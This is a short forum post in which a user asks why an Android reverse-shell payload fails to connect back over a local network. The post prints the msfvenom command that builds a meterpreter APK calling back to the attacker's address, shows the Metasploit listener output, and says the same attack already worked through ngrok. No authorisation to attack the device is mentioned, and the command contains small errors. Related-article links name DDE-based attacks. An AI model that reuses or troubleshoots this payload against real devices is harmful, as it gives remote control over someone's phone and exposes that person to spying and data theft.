Payload Android Not Connect to Metasploit Listener Kali 2019

Nov 28, 2019 08:06 PM

Hello I am trying to hack an Android via a reverse tcp payload

I generated the payload with

Msfvenom -p Android/meterpreter/reverse-tcp lhost= my-wlan0-ip lport=4444 R> payload.apk

Both the laptop and the Android are in the same network

But when I launch the exploit

It stop here

Started reverse tcp handler on 192.168.x.x:44444

Then nothing

I already try this with ngrok and it worked for me , but I wanted to do it in locale Network but it is not working

I am using Kali 2019 with the last version of metasploit

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!